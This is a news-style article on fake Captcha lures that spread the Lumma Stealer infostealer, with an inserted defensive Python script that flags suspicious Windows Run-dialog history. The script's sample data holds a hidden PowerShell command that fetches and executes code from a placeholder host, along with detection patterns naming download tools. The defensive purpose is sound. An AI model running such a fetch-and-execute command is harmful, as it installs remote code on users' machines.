Introduction
A new report from cybersecurity company DNSFilter finds that malicious actors are using deceptive Captcha prompts to distribute Lumma Stealer malware, a sophisticated information stealer that primarily targets Windows users. The threat was first identified on a banking site in Greece, where users were misled into copying a command into their system's Run dialog and executing it by pressing Enter.
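Because the lure depends on the victim typing a pasted command into Win+R, the Run dialog's own history is a cheap place to look for it. The following is an added defender example, not code from the report or from DNSFilter: it assumes the values of the Windows key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU have already been exported into a name-to-value dictionary (a constructed sample is embedded) and flags entries that look like a pasted launcher rather than a program name.

```python
"""Flag Run-dialog (Win+R) history entries that look like a pasted fake-Captcha lure."""
import re
from typing import Dict, List, Tuple

# Constructed sample of the RunMRU key (hypothetical values, not from the report).
# Each value ends in "\1"; MRUList lists value names from most to least recent.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/verify | iex"\\1',
}

# Heuristics for content that a user would not normally type into Run by hand.
SUSPICIOUS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\bpowershell(\.exe)?\b.*-(w(indowstyle)?\s+hidden|enc|ep\s|executionpolicy)", re.I),
     "hidden/encoded PowerShell"),
    (re.compile(r"\bmshta(\.exe)?\b", re.I), "mshta launcher"),
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|bitsadmin)\b", re.I), "download from Run dialog"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"https?://", re.I), "URL in Run dialog"),
]


def run_history(runmru: Dict[str, str]) -> List[str]:
    """Return the typed commands, most recent first, with the trailing '\\1' removed."""
    order = runmru.get("MRUList", "")
    return [runmru[name].removesuffix("\\1") for name in order if name in runmru]


def flag_commands(runmru: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Return (command, reasons) for every history entry that matches a heuristic."""
    findings = []
    for cmd in run_history(runmru):
        reasons = [label for rx, label in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in flag_commands(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS Run entry: {cmd!r} -> {', '.join(reasons)}")
```

The same heuristics apply to the Run-dialog command line recorded in process-creation telemetry, which survives even if the user clears the Run history.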
Key Findings
Over just three days, 23 interactions with this counterfeit Captcha were recorded among DNSFilter's clientele. Approximately 17% of the users who encountered the prompt followed the harmful instructions, leading to attempted malware installations.
Mechanics of Lumma Stealer
Mikey Pruitt, DNSFilter’s Global Partner Evangelist, detailed the mechanics of Lumma Stealer, highlighting that it scours infected devices for sensitive information, ranging from browser-stored passwords and cookies to cryptocurrency wallet data and two-factor authentication tokens.
Pruitt explained that the extracted data is often exploited for financial gain, contributing to identity theft and fraudulent online transactions involving access to victims’ cryptocurrency holdings.
Malware-as-a-Service Model
The nature of this malware, which operates under the Malware-as-a-Service (MaaS) model, has contributed to an uptick in cyber threats in recent years. According to ESET malware analyst Jakub Tomanek, the creators behind Lumma Stealer are actively enhancing its capabilities to avoid detection while also establishing domains to facilitate its operations. He described it as a sustainable business model for cybercriminals who collect subscription fees from affiliates, allowing them to avoid the complexities of developing their own malicious software.
Resurgence and Financial Impact
Despite efforts from law enforcement, including the U.S. Department of Justice’s seizure of domains used for Lumma Stealer in May, the malware has returned, with Trend Micro identifying a resurgence in targeted attacks during July. The affordability of subscriptions—available for as low as $250 on dark web forums—adds to the appeal for cybercriminals, who can then focus on what they do best: targeting high-value assets such as cryptocurrency wallets and authentication systems.
Estimated Losses
Nathaniel Jones, a security expert from Darktrace, indicated that losses attributed to Lumma Stealer reached an estimated $36.5 million in 2023 alone, with around 400,000 Windows devices being compromised within two months.
The alarming aspect is not just the financial figures but the multifaceted approach to monetizing stolen data, including harvesting browser histories and system configurations before sending them to command-and-control servers purportedly located in Russia.
Long-term Consequences
Furthermore, experts indicate that stolen credentials often flow directly to organized groups that specialize in reselling such data, creating a ripple effect of further breaches, including bank fraud and identity theft, that can persist long after the original infection. Though debate over an alleged Russian origin for Lumma Stealer continues, Pruitt emphasized the multinational collaboration typical of these cybercriminal enterprises, noting that actors across multiple regions may be involved and that they take advantage of international servers and distribution networks.